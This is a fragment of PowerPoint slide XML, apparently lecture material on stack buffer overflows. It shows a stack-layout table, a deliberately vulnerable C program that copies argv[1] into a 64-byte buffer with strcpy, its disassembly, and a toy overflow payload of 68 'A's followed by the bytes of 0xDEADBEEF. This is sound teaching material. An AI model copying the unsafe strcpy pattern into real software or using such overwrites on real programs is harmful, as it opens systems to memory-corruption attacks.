            <a:off x="2400300" y="1524000"/>
            <a:ext cx="4343400" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2581955333"/>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END</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Subtitle 5"/>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397032531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4157594158"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="4817544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argc</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>[1]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“A”x68 . “\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xBE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xDE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="6629400" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>main(</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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>**</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[64]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1])</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>of assembler code for function main:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483e4 &lt;+0&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483e5 &lt;+1&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483e7 &lt;+3&gt;:	sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$72,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483ea &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>12(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483ed &lt;+9&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483f0 &lt;+12&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483f4 &lt;+16&gt;:	lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-64(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483f7 &lt;+19&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x080483ff &lt;+27&gt;:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048400 &lt;+28&gt;:	ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69342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47839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
